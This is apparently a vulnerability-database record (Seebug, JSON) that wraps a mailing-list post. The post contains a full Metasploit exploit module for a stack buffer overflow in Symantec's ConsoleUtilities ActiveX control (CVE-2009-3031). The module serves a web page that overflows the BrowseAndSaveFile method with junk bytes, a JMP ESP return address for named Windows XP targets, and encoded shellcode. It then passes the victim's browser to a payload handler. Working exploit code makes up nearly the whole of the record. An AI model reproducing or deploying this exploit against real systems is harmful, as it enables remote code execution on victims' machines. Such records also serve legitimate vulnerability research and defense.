Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-12563", "status": "poc", "bulletinFamily": "exploit", "modified": "2009-11-03T00:00:00", "title": "Symantec ConsoleUtilities ActiveX Control Buffer", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-12563", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2009-11-03T00:00:00", "sourceData": "\n here is a metasploit exploit module for the Symantec ConsoleUtilities\r\nActiveX Control buffer overflow i published today.\r\n\r\nhttp://sotiriu.de/adv/NSOADV-2009-001.txt\r\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=2009-3031\r\n\r\nSorry, if the code is ugly. It's my first MSF exploit.\r\n\r\nRegards\r\n\r\nlofi\r\n\r\n["symantec_consoleutilities_browseandsavefile.rb" (text/plain)]\r\n\r\n## \r\n# Use it only for education or ethical pentesting! The author accepts no liability for damage caused by \\\r\nthis tool. ##\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Symantec ConsoleUtilities ActiveX Control Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack overflow in Symantecs \\\r\n ConsoleUtilities.\r\n By sending an overly long string to the "BrowseAndSaveFile()" \\\r\n method located\r\n in the AeXNSConsoleUtilities.dll (6.0.0.1846) Control, an \\\r\nattacker may be able to execute arbitrary code.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [ 'Nikolas Sotiriu (lofi)' ],\r\n 'Version' => '1.0',\r\n 'References' =>\r\n [\r\n [ 'CVE', '2009-3031'],\r\n [ 'URL', 'http://sotiriu.de/adv/NSOADV-2009-001.txt' ],\r\n [ 'URL', \\\r\n'http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid= \\\r\nsecurity_advisory&year=2009&suid=20091102_00' ], ],\r\n 'DefaultOptions' =>\r\n {\r\n 'EXITFUNC' => 
'process',\r\n },\r\n 'Payload' =>\r\n {\r\n 'Space' => 1000,\r\n 'BadChars' => "\\x00",\r\n 'StackAdjustment' => -3500,\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n\t\t\t\t\t[ 'Windows XP SP2 Universal',\t { 'Ret' => 0x77d92acc } ], # USER32.dll JMP ESP\r\n\t\t\t\t\t[ 'Windows XP SP2 Pro German', { 'Ret' => 0x77D5AF0A } ], # SHELL32.dll JMP ESP\r\n\t\t\t\t\t[ 'Windows XP SP3 Pro German', { 'Ret' => 0x7E6830D7 } ], # SHELL32.dll JMP ESP\r\n ],\r\n 'DisclosureDate' => 'Nov 02 2009',\r\n 'DefaultTarget' => 0))\r\n end\r\n\r\n def autofilter\r\n false\r\n end\r\n\r\n def check_dependencies\r\n use_zlib\r\n end\r\n\r\n def on_request_uri(cli, request)\r\n # Re-generate the payload\r\n return if ((p = regenerate_payload(cli)) == nil)\r\n\r\n # Randomize variables\r\n vname = rand_text_alpha(rand(20) + 1)\r\n junk = rand_text_alpha(rand(20) + 1)\r\n eip = rand_text_alpha(rand(20) + 1)\r\n morejunk = rand_text_alpha(rand(20) + 1)\r\n sc = rand_text_alpha(rand(20) + 1)\r\n buf = rand_text_alpha(rand(20) + 1)\r\n\r\n\r\n # Set RET and shellcode\r\n ret = Rex::Text.to_unescape([target.ret].pack('V'))\r\n shellcode = Rex::Text.to_unescape(p.encoded)\r\n\r\n # Build the Site\r\n content = %Q|\r\n <html>\r\n <object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' \\\r\nid='#{vname}'></object> <script language='vbscript'>\r\n arg1 = ""\r\n arg3 = ""\r\n arg4 = ""\r\n arg5 = ""\r\n\r\n #{junk}=String(310, "A")\r\n #{eip}=unescape("#{ret}")\r\n #{morejunk}=String(18, unescape("%u0041"))\r\n #{sc}=unescape("#{shellcode}")\r\n\r\n #{buf}=#{junk}+#{eip}+#{morejunk}+#{sc}\r\n #{vname}.BrowseAndSaveFile arg1,#{buf},arg3,arg4,arg5\r\n </script>\r\n </html>\r\n |\r\n\r\n print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")\r\n\r\n # Transmit the response to the client\r\n send_response_html(cli, content)\r\n\r\n # Handle the payload\r\n handler(cli)\r\n 
end\r\n\r\nend\r\n_______________________________________________\r\nhttps://mail.metasploit.com/mailman/listinfo/framework\n ", "id": "SSV:12563", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T18:32:48", "reporter": "Root", "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-3031"]}]}, "exploitation": null, "vulnersScore": 0.9}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645394556, "score": 1659785532, "epss": 1678851499}}